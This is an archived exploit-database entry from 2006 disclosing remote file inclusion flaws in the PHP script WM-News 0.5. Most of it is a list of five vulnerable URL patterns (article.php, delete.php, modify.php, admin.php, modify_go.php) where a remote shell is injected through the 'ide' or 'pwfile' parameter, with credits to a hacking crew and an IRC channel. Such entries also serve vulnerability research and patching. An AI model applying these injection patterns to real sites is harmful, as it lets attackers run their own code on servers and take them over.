WM-News 0.5 - Multiple Remote File Inclusions

EDB-ID:

2326


Author:

ddoshomo

Type:

webapps


Platform:

PHP

Date:

2006-09-07


# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----

# WM-News v0.5 - Remote File Include Vulnerabilities

# site    : http://www.comscripts.com/jump.php?action=script&id=203

# Script  :  WM-News v0.5

# Credits : ERNE

# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack

# Thanks  : BLaCKWHITE, B0tan, FearLesS, B3g0k, Liz0zim, EntRiKa, Dj_Remix, Di_Lejyoner

# Vulnerable :
    http://www.site.com/[path]/content/article.php?ide=[shell]
    http://www.site.com/[path]/content/delete.php?pwfile=[shell]
    http://www.site.com/[path]/content/modify.php?pwfile=[shell]
    http://www.site.com/[path]/content/admin.php?pwfile=[shell]
    http://www.site.com/[path]/content/modify_go.php?pwfile=[shell]


# milw0rm.com [2006-09-07]